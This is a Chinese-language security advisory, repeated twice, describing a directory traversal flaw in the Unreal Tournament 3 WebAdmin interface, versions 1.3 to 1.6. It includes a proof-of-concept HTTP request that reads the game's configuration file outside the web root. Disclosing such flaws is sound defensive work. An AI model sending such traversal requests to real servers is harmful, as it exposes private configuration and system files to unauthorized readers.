BUGTRAQ ID: 31272 CNCAN ID:CNCAN-2008092305 Unreal Tournament 3 (UT3)是一款基于Unreal引擎的游戏程序,包含内部WEB服务程序。 Unreal Tournament 3 (UT3)包含的管理员接口不正确过滤用户输入,远程攻击者可以利用漏洞以WEB权限查看web root外的文件内容。 提交类似如下的请求,可绕过WEB ROOT限制,以WEB权限查看系统文件内容: GET /images/../../UTGame/Config/UTGame.INI HTTP/1.0 Host: localhost Epic Games UT3 WebAdmin 1.6 Epic Games UT3 WebAdmin 1.5 Epic Games UT3 WebAdmin 1.4 Epic Games UT3 WebAdmin 1.3 目前没有解决方案提供: <a href=http://www.unrealtournament3.com target=_blank>http://www.unrealtournament3.com</a>
BUGTRAQ ID: 31272 CNCAN ID:CNCAN-2008092305 Unreal Tournament 3 (UT3)是一款基于Unreal引擎的游戏程序,包含内部WEB服务程序。 Unreal Tournament 3 (UT3)包含的管理员接口不正确过滤用户输入,远程攻击者可以利用漏洞以WEB权限查看web root外的文件内容。 提交类似如下的请求,可绕过WEB ROOT限制,以WEB权限查看系统文件内容: GET /images/../../UTGame/Config/UTGame.INI HTTP/1.0 Host: localhost Epic Games UT3 WebAdmin 1.6 Epic Games UT3 WebAdmin 1.5 Epic Games UT3 WebAdmin 1.4 Epic Games UT3 WebAdmin 1.3 目前没有解决方案提供: <a href=http://www.unrealtournament3.com target=_blank>http://www.unrealtournament3.com</a>